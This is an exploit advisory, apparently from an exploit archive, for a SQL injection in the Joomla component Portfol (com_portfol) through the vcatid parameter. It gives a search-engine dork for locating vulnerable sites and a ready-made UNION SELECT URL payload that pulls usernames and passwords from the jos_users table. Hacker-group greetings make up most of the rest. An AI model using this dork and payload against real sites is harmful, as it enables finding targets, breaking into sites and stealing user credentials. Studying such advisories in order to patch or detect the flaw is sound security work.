id: 4642
date: 01/12/2009
title: Joomla Component Portfol (vcatid) SQL Injection Vulnerability
author: H!tm@N
cves: 

=============================================================
Joomla Component Portfol (vcatid) SQL Injection Vulnerability
=============================================================


#############################################################################
#							                    #
#           Joomla Component Portfol SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Portfol (com_portfol)"
[~] Version:       "1.2" 
[~] Date:          "20.10.2006"
[~] Author:        "mivaco"

########################################

[~] DORK: inurl:"com_portfol" 

########################################

[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--

########################################



#  0day.today [2023-03-22]  #